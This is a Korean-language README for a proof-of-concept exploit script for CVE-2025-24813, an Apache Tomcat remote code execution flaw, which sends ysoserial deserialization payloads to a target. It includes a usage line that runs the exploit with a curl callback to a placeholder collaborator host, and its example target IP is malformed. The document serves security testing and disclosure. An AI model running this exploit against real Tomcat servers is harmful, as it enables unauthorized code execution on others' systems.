
CVE-2025-24813용 PoC
CVE-2025-24813은 Apache Tomcat에 영향을 미칩니다. 취약한 버전이고 매우 잘못 구성된 경우, 공격자는 GET 1회와 POST 1회만으로 RCE(원격 코드 실행)를 달성할 수 있습니다.
자세한 정보는 여기에서 확인하세요.
이 스크립트는 최근 writeup에서 공개된 Yiheng An, Jun Li, Qiang Liu, Haozhe Zhang, Qi Deng의 스크립트를 수정하여, 명령어를 입력받고 모든 ysoserial 가젯 페이로드를 생성해 대상에 전송할 수 있게 한 것입니다.
윤리적 보안 테스트를 위해 공유합니다.
사용 예시:
python3 exploit.py --command 'curl http://yourcollaburl' --target 'http://192.168.10.0.1:8080' --proxy '127.0.0.1:8080'
poc.mp4는 스크립트가 실제로 실행되어 페이로드를 생성하고 대상에 전송하는 모습을 보여주며, 오른쪽 패널에서는 interact 리스너가 호출되는 것을 확인할 수 있습니다.